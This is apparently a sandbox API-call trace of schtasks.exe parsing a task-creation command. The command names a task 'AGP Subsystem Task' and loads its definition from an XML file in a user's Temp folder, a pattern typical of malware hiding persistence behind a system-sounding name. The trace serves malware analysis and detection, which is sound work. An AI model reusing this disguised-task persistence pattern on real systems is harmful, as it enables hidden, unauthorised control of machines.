[0170.386] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.386] lstrlenW (lpString="tn") returned 2
[0170.386] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.386] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|showsid|") returned 9
[0170.386] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|tn|") returned 4
[0170.386] lstrlenW (lpString="|showsid|") returned 9
[0170.386] lstrlenW (lpString="|tn|") returned 4
[0170.386] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="/tn") returned 3
[0170.386] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="/tn") returned 3
[0170.386] GetProcessHeap () returned 0x4e0000
[0170.386] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x8) returned 0x4f6978
[0170.386] GetProcessHeap () returned 0x4e0000
[0170.386] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5368
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.386] lstrlenW (lpString="-/") returned 2
[0170.386] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x490)
[0170.386] SetLastError (dwErrCode=0x0)
[0170.386] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.386] StrChrIW (lpStart="AGP Subsystem Task", wMatch=0x3a) returned 0x0
[0170.386] SetLastError (dwErrCode=0x490)
[0170.387] SetLastError (dwErrCode=0x0)
[0170.387] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.387] GetProcessHeap () returned 0x4e0000
[0170.387] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x26) returned 0x4f6988
[0170.387] GetProcessHeap () returned 0x4e0000
[0170.387] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5388
[0170.387] SetLastError (dwErrCode=0x0)
[0170.387] SetLastError (dwErrCode=0x0)
[0170.387] lstrlenW (lpString="/xml") returned 4
[0170.387] lstrlenW (lpString="-/") returned 2
[0170.387] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.387] lstrlenW (lpString="?") returned 1
[0170.387] lstrlenW (lpString="?") returned 1
[0170.387] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] lstrlenW (lpString="xml") returned 3
[0170.387] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.387] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.387] lstrlenW (lpString="|?|") returned 3
[0170.387] lstrlenW (lpString="|xml|") returned 5
[0170.387] SetLastError (dwErrCode=0x490)
[0170.387] lstrlenW (lpString="create") returned 6
[0170.387] lstrlenW (lpString="create") returned 6
[0170.387] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] lstrlenW (lpString="xml") returned 3
[0170.387] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.387] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.387] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.387] lstrlenW (lpString="|create|") returned 8
[0170.388] lstrlenW (lpString="|xml|") returned 5
[0170.388] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0170.388] SetLastError (dwErrCode=0x490)
[0170.388] lstrlenW (lpString="delete") returned 6
[0170.388] lstrlenW (lpString="delete") returned 6
[0170.388] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] lstrlenW (lpString="xml") returned 3
[0170.388] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|delete|") returned 8
[0170.388] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.388] lstrlenW (lpString="|delete|") returned 8
[0170.388] lstrlenW (lpString="|xml|") returned 5
[0170.388] StrStrIW (lpFirst="|delete|", lpSrch="|xml|") returned 0x0
[0170.388] SetLastError (dwErrCode=0x490)
[0170.388] lstrlenW (lpString="query") returned 5
[0170.388] lstrlenW (lpString="query") returned 5
[0170.388] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] lstrlenW (lpString="xml") returned 3
[0170.388] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|query|") returned 7
[0170.388] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.388] lstrlenW (lpString="|query|") returned 7
[0170.388] lstrlenW (lpString="|xml|") returned 5
[0170.388] StrStrIW (lpFirst="|query|", lpSrch="|xml|") returned 0x0
[0170.388] SetLastError (dwErrCode=0x490)
[0170.388] lstrlenW (lpString="change") returned 6
[0170.388] lstrlenW (lpString="change") returned 6
[0170.388] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.388] lstrlenW (lpString="xml") returned 3
[0170.389] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|change|") returned 8
[0170.389] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.389] lstrlenW (lpString="|change|") returned 8
[0170.389] lstrlenW (lpString="|xml|") returned 5
[0170.389] StrStrIW (lpFirst="|change|", lpSrch="|xml|") returned 0x0
[0170.389] SetLastError (dwErrCode=0x490)
[0170.389] lstrlenW (lpString="run") returned 3
[0170.389] lstrlenW (lpString="run") returned 3
[0170.389] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] lstrlenW (lpString="xml") returned 3
[0170.389] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|run|") returned 5
[0170.389] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.389] lstrlenW (lpString="|run|") returned 5
[0170.389] lstrlenW (lpString="|xml|") returned 5
[0170.389] StrStrIW (lpFirst="|run|", lpSrch="|xml|") returned 0x0
[0170.389] SetLastError (dwErrCode=0x490)
[0170.389] lstrlenW (lpString="end") returned 3
[0170.389] lstrlenW (lpString="end") returned 3
[0170.389] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] lstrlenW (lpString="xml") returned 3
[0170.389] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.389] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|end|") returned 5
[0170.389] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.389] lstrlenW (lpString="|end|") returned 5
[0170.390] lstrlenW (lpString="|xml|") returned 5
[0170.390] StrStrIW (lpFirst="|end|", lpSrch="|xml|") returned 0x0
[0170.390] SetLastError (dwErrCode=0x490)
[0170.390] lstrlenW (lpString="showsid") returned 7
[0170.390] lstrlenW (lpString="showsid") returned 7
[0170.390] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.390] lstrlenW (lpString="xml") returned 3
[0170.390] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.390] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|showsid|") returned 9
[0170.390] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|xml|") returned 5
[0170.390] lstrlenW (lpString="|showsid|") returned 9
[0170.390] lstrlenW (lpString="|xml|") returned 5
[0170.390] StrStrIW (lpFirst="|showsid|", lpSrch="|xml|") returned 0x0
[0170.390] SetLastError (dwErrCode=0x490)
[0170.390] SetLastError (dwErrCode=0x490)
[0170.390] SetLastError (dwErrCode=0x0)
[0170.390] lstrlenW (lpString="/xml") returned 4
[0170.422] StrChrIW (lpStart="/xml", wMatch=0x3a) returned 0x0
[0170.422] SetLastError (dwErrCode=0x490)
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] lstrlenW (lpString="/xml") returned 4
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xa) returned 0x4f4cc0
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f53a8
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.422] lstrlenW (lpString="-/") returned 2
[0170.422] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0170.422] SetLastError (dwErrCode=0x490)
[0170.422] SetLastError (dwErrCode=0x490)
[0170.422] SetLastError (dwErrCode=0x0)
[0170.422] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.422] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp"
[0170.422] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4cf0
[0170.422] _memicmp (_Buf1=0x4f4cf0, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.422] GetProcessHeap () returned 0x4e0000
[0170.422] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xc) returned 0x4f4d08
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4d20
[0170.423] _memicmp (_Buf1=0x4f4d20, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x64) returned 0x4f69b8
[0170.423] SetLastError (dwErrCode=0x7a)
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] lstrlenW (lpString="C") returned 1
[0170.423] SetLastError (dwErrCode=0x490)
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x60) returned 0x4f6a28
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f53c8
[0170.423] SetLastError (dwErrCode=0x0)
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6968) returned 0x6
[0170.423] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968 | out: hHeap=0x4e0000) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5328) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5328) returned 0x14
[0170.423] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5328 | out: hHeap=0x4e0000) returned 1
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.423] GetProcessHeap () returned 0x4e0000
[0170.424] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6978) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6978) returned 0x8
[0170.424] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6978 | out: hHeap=0x4e0000) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5368) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5368) returned 0x14
[0170.424] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5368 | out: hHeap=0x4e0000) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6988) returned 1
[0170.424] GetProcessHeap () returned 0x4e0000
[0170.424] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6988) returned 0x26
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6988 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5388) returned 0x14
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cc0) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4cc0) returned 0xa
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cc0 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53a8) returned 0x14
[0170.425] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8 | out: hHeap=0x4e0000) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28) returned 1
[0170.425] GetProcessHeap () returned 0x4e0000
[0170.425] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6a28) returned 0x60
[0170.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28 | out: hHeap=0x4e0000) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53c8) returned 0x14
[0170.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8 | out: hHeap=0x4e0000) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060) returned 1
[0170.426] GetProcessHeap () returned 0x4e0000
[0170.426] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4ef060) returned 0x10
[0170.426] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060 | out: hHeap=0x4e0000) returned 1
[0170.426] SetLastError (dwErrCode=0x0)
[0170.426] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0170.427] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0170.427] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0170.427] VerifyVersionInfoW (in: lpVersionInformation=0x13cd44, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x13cd44) returned 1
[0170.427] SetLastError (dwErrCode=0x0)
[0170.427] lstrlenW (lpString="create") returned 6
[0170.427] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0170.427] SetLastError (dwErrCode=0x490)
[0170.427] SetLastError (dwErrCode=0x0)
[0170.427] lstrlenW (lpString="create") returned 6
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f53c8
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4ef060
[0170.427] _memicmp (_Buf1=0x4ef060, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x16) returned 0x4f53a8
[0170.427] SetLastError (dwErrCode=0x0)
[0170.427] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.427] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f5a90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0170.427] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0170.427] GetProcessHeap () returned 0x4e0000
[0170.427] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x74e) returned 0x4f5ca0
[0170.428] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x4f5ca0 | out: lpData=0x4f5ca0) returned 1
[0170.428] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13ce4c, puLen=0x13ce50 | out: lplpBuffer=0x13ce4c*=0x4f603c, puLen=0x13ce50) returned 1
[0170.428] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.428] _vsnwprintf (in: _Buffer=0x4f5a90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x13ce34 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0170.428] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x13ce5c, puLen=0x13ce58 | out: lplpBuffer=0x13ce5c*=0x4f5e68, puLen=0x13ce58) returned 1
[0170.428] lstrlenW (lpString="schtasks.exe") returned 12
[0170.428] lstrlenW (lpString="schtasks.exe") returned 12
[0170.428] lstrlenW (lpString=".EXE") returned 4
[0170.428] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0170.428] lstrlenW (lpString="schtasks.exe") returned 12
[0170.428] lstrlenW (lpString=".EXE") returned 4
[0170.428] lstrlenW (lpString="schtasks") returned 8
[0170.428] lstrlenW (lpString="/create") returned 7
[0170.428] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.428] _vsnwprintf (in: _Buffer=0x4f5a90, _BufferCount=0x19, _Format="%s %s", _ArgList=0x13ce34 | out: _Buffer="schtasks /create") returned 16
[0170.428] _memicmp (_Buf1=0x4f4c78, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.428] GetProcessHeap () returned 0x4e0000
[0170.428] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5388
[0170.428] _memicmp (_Buf1=0x4f4c90, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.429] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4f6728, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0170.429] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x30) returned 0x4f6968
[0170.429] _vsnwprintf (in: _Buffer=0x4f6680, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x13ce38 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0) returned 1
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5ca0) returned 0x74e
[0170.429] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0 | out: hHeap=0x4e0000) returned 1
[0170.429] SetLastError (dwErrCode=0x0)
[0170.429] GetThreadLocale () returned 0x409
[0170.429] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="create") returned 6
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="?") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="s") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="u") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="p") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="ru") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="rp") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="sc") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="mo") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="d") returned 1
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="m") returned 1
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="i") returned 1
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="tn") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="tr") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="st") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="sd") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="ed") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="it") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="et") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="k") returned 1
[0170.432] GetThreadLocale () returned 0x409
